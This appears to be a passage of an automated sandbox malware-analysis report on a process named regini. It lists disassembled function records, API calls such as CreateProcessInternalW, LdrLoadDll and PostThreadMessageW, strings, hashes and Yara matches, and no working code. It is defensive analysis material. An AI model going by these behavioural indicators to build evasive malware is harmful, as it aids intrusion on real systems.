                                                                  • Instruction ID: 2d6f5d2218bb898cab503d7c68505ad8d4a5a849be27ba0430a836edc195ea44
                                                                  • Opcode Fuzzy Hash: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
                                                                  • Instruction Fuzzy Hash: 1F900225221C4442D240B5694C14B070005C7E0303F55C11AA0154954CCB1789615525
                                                                  Function 034B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                                  • Instruction ID: 1a54008958dfa26193d1899c51ee1ef68a72d9a2de874db22dc53bc8cee1ed02
                                                                  • Opcode Fuzzy Hash: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                                  • Instruction Fuzzy Hash: 7B900225611444424180B16988449064005EBF1211755C126A0998950D875B89655669
                                                                  Function 034B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
                                                                  • Instruction ID: 041634e139c5cab3de8ae4913ee766603494fc3b783c4831d3b175ffca5ca1d5
                                                                  • Opcode Fuzzy Hash: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
                                                                  • Instruction Fuzzy Hash: 1D90026521184803D180B55948046070005C7E0302F55C016A2064955E8B2B8D516139
                                                                  Function 034B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                                  • Instruction ID: e21eca0d4752df6d6161d5782362c25d02341f375356c4944dda8c8134a5924d
                                                                  • Opcode Fuzzy Hash: af2c39af585021cc70410ee39c70c6edd0d3fe39b2d8a1ef1d9f2c659dfa5bde
                                                                  • Instruction Fuzzy Hash: 5B90022561144902D141B1594404616000AC7E0241F95C027A1024955ECB278A92A135
                                                                  Function 034B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                                  • Instruction ID: e1e824288879f9cd2d12d69655da92df1a9f825a218fc2f6d00371daf561d3bf
                                                                  • Opcode Fuzzy Hash: 1afb4e4fba97b0ac207e31fa4ae1ba3bcaa016683153239fa2455f2bcef14d1d
                                                                  • Instruction Fuzzy Hash: 9490022D22344402D1C0B159540860A0005C7E1202F95D41AA0015958CCB1789695325
                                                                  Function 034B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                                  • Instruction ID: 89eaacf229ae0ce3f9aecbb02c0efdcfb0e906512239e0c4db40f83ad58f257c
                                                                  • Opcode Fuzzy Hash: 5036b8d2a47235b83bc94b0163797dff50e1300246bb884b8dcc196cd206e1fe
                                                                  • Instruction Fuzzy Hash: EE90022531144403D180B15954186064005D7F1301F55D016E0414954CDB1789565226
                                                                  Function 034B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                                  • Instruction ID: a1a31829abce683e936ea4c30c4f1344a54f9e838fafdee7d03802f7d6f348c6
                                                                  • Opcode Fuzzy Hash: 53e161bb0a48c08b4d1b44cc7b19931d9c2d7ebfbaa9306653c8b25a34f51fe2
                                                                  • Instruction Fuzzy Hash: 7A900225252485525585F15944045074006D7F0241795C017A1414D50C87279956D625
                                                                  Function 034B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                                  • Instruction ID: a4e260661a36aba86f445ee23974bde7726213d14343bdb8584a0ea45ef802af
                                                                  • Opcode Fuzzy Hash: ede3a2d587cb943c9279b8dd9738bd88b6ce98162e313cf865354d8376c11fc4
                                                                  • Instruction Fuzzy Hash: 9190023521144813D151B15945047070009C7E0241F95C417A0424958D97578A52A125
                                                                  Function 034B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                                  • Instruction ID: 2412f3e4a833719adb06dbcdc10516f737038cdffdd703ce412d2264be374f12
                                                                  • Opcode Fuzzy Hash: 0474e163318d360e3a18945e30eb52afc7722b138baa8edf469b3ce6ba124c2e
                                                                  • Instruction Fuzzy Hash: 5190023521144C42D140B1594404B460005C7F0301F55C01BA0124A54D8717C9517525
                                                                  Function 034B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                                  • Instruction ID: 17a2c0e10632d32c2f24dea09099ca702feb8effe5293dab8d8e62103f8c2966
                                                                  • Opcode Fuzzy Hash: e882d53a7a4e29e3deef7289567567da24d48cd6c7b8b238de19f17c566a3a1c
                                                                  • Instruction Fuzzy Hash: 139002352114CC02D150B159840474A0005C7E0301F59C416A4424A58D879789917125
                                                                  Function 034B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                                  • Instruction ID: 940224d90e359e3da0d3990cde265a35c0834b0ecc3b743fc23fe639f8c7e286
                                                                  • Opcode Fuzzy Hash: 66108b65c9ea447d41799176ed0b92b1ed790e4b27176d5524e8415a69232d23
                                                                  • Instruction Fuzzy Hash: 1990023521144802D140B59954086460005C7F0301F55D016A5024955EC76789916135
                                                                  Function 034B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                                  • Instruction ID: a28be837a315b24b01e2c571c06a5ad818e824069138c0ced60e704927e37614
                                                                  • Opcode Fuzzy Hash: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                                  • Instruction Fuzzy Hash: BE90023561554802D140B15945147061005C7E0201F65C416A0424968D87978A5165A6
                                                                  Function 034B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                                  • Instruction ID: 10e5c2c9214db14201303b3ac6f5146841dfd0329df7cc94a5758dbdb4fade97
                                                                  • Opcode Fuzzy Hash: 0562bb867efaad0d7d6b9c07eebb21b1a376b1025bc683bf5f376a1f813f15cd
                                                                  • Instruction Fuzzy Hash: 3090022525549502D190B15D44046164005E7F0201F55C026A0814994D875789556225
                                                                  Function 0092103A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 457 92103a-921044 458 921046-92104d 457->458 459 92107e-921081 457->459 460 921096-9210ab 458->460 461 92104f-921059 458->461 462 92112c-92114e 460->462 463 9210ad-9210c5 460->463 464 921170-921175 462->464 465 921150-921161 PostThreadMessageW 462->465 463->462 465->464 466 921163-92116d 465->466 466->464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-152878582
                                                                  • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction ID: 09b0a890f3c2ef5b6ac155053e310b4008f57ccefc55a389bcbaf602d36ed640
                                                                  • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction Fuzzy Hash: 1F11A371B893666BC702CEA49C417DDB7749F52700F0485EADA049F2C2D3B14D5B87D5
                                                                  Function 009210E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 0092115D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 1836367815-59622768
                                                                  • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction ID: 80cbc34c21a56e1a96ad5cf4d48d7c10a680dd796e92da9fe34ef0fa4b0d5453
                                                                  • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction Fuzzy Hash: D701C471D4125876EB21AA908C02FDFBB7C9F81B50F008155FB147B281D7B86A068BE6
                                                                  Function 0092F799 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                  • Instruction ID: 0147ee324aeabfe7dad54695f411c1a2311f64f90c0dfee3086735fb4ba39fd2
                                                                  • Opcode Fuzzy Hash: 5c8f61afe39968cdc0262e8706fd851897aae8b8c2792e7432e2034d9de46969
                                                                  • Instruction Fuzzy Hash: 774133B5A006199FDB00DFD8DC809EFB7B9FF88304B104569E516AB215D775AE05CFA0
                                                                  Function 00933CB0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000007D0), ref: 00933D8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: net.dll$wininet.dll
                                                                  • API String ID: 3472027048-1269752229
                                                                  • Opcode ID: 280fd6eaa3bf16d0bfc5aa78424d18e4e624768c5d1575d100cfc6e7ad87c3e5
                                                                  • Instruction ID: c8f9448abe5e1e9b9c33a98e70495e289bd0ad5b04fe55d6804d7b9f1d6267a6
                                                                  • Opcode Fuzzy Hash: 280fd6eaa3bf16d0bfc5aa78424d18e4e624768c5d1575d100cfc6e7ad87c3e5
                                                                  • Instruction Fuzzy Hash: 7E318FB1A41605BBD714DFA4C885FEBBBBCEB84700F00851CFA295B281C7B46A408FA5
                                                                  Function 0092F7A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeUninitialize
                                                                  • String ID: @J7<
                                                                  • API String ID: 3442037557-2016760708
                                                                  • Opcode ID: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                  • Instruction ID: d9e79b943c96faa9156aa21ec93d88b3aecd5086cce1cb3d43ba6a9bddec7345
                                                                  • Opcode Fuzzy Hash: 1c77e547fd79fcce36bf9df70f39e975db22a09bbaa201da96c6956962a185f2
                                                                  • Instruction Fuzzy Hash: 10312FB5A0020A9FDB00DFD8D8809EEB7B9BF88304F108569E506AB214D775EE058BA0
                                                                  Function 00924900 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009248F2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                  • Instruction ID: 3bc2e7a4a329a3b2252f37e5e79941150f79fb3a50db8c27df5a605883a5148b
                                                                  • Opcode Fuzzy Hash: 295511a4b9a9809ddb0f2405e035b47971a4899ec19f0757c05ee201b5cbdbb2
                                                                  • Instruction Fuzzy Hash: 3A01C02AA0425C7FCF10EA74EC42AE97778DF41745F040254D585E7202E132F60F8BC1
                                                                  Function 00924880 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009248F2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction ID: a6935a8011225f9787efbeeaeca978ab85f1e4f23051cb90cadd69cae242de53
                                                                  • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction Fuzzy Hash: 47011EB5E4020DABDB10EAA4EC42F9DB3B8AB54708F004195E909A7241F671EB14CB91
                                                                  Function 00939AE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,0092864E,00000010,?,?,?,00000044,?,00000010,0092864E,?,?,?), ref: 00939B40
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInternalProcess
                                                                  • String ID:
                                                                  • API String ID: 2186235152-0
                                                                  • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                  • Instruction ID: 7e8ef2cdea560c1d477bcf7299d4347dbf4a5712278711f6410e577edcddce07
                                                                  • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                  • Instruction Fuzzy Hash: D40180B6205108BBDB44DF99DC91EDB77ADAF8C754F018508BA49E3241D630F9518BA4
                                                                  Function 00919DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00919E25
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                  • Instruction ID: 3dc2a9fc12be07bb19d472ed90bfa20a05e5db938db175ac5fb2beaf9f8f7f23
                                                                  • Opcode Fuzzy Hash: 09599bacac6296b3e500525234d41ace2e86357925da6c38dffadbb1074705f5
                                                                  • Instruction Fuzzy Hash: E6F06D7378171436E73061E99C02FDBB68CCBC0BA1F144025FB1DEB1C1D996B84186A5
                                                                  Function 00919DDC Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00919E25
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread
                                                                  • String ID:
                                                                  • API String ID: 2422867632-0
                                                                  • Opcode ID: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                  • Instruction ID: 8d17e75273a4779d0fe6df4508a5c818b03d86b901ca7728018066f14ce280d0
                                                                  • Opcode Fuzzy Hash: 16b1c3e28c50ff0840523fe201d9b8e2824fdbd3defa945c96347b3a63df4177
                                                                  • Instruction Fuzzy Hash: A5F06D7279071437D630A298CC02FCB765CCB80B61F104018FB1DAB2C1D9A5B8418AA5
                                                                  Function 00939A00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00921D69,?,00935DDA,00921D69,0093589E,00935DDA,?,00921D69,0093589E,00001000,?,?,00000000), ref: 00939A3F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction ID: c7e20e9c6efc2ce3fa1a55e52ce6cca7ff22932d067fc5be9c5af47e21651eed
                                                                  • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction Fuzzy Hash: F3E06D752082097BCA10EE59DC41FEB33ADEFC5710F004419FA08A7241CB30B9108AB4
                                                                  Function 00939A50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,009240EB,000000F4), ref: 00939A8F
                                                                  Memory Dump Source
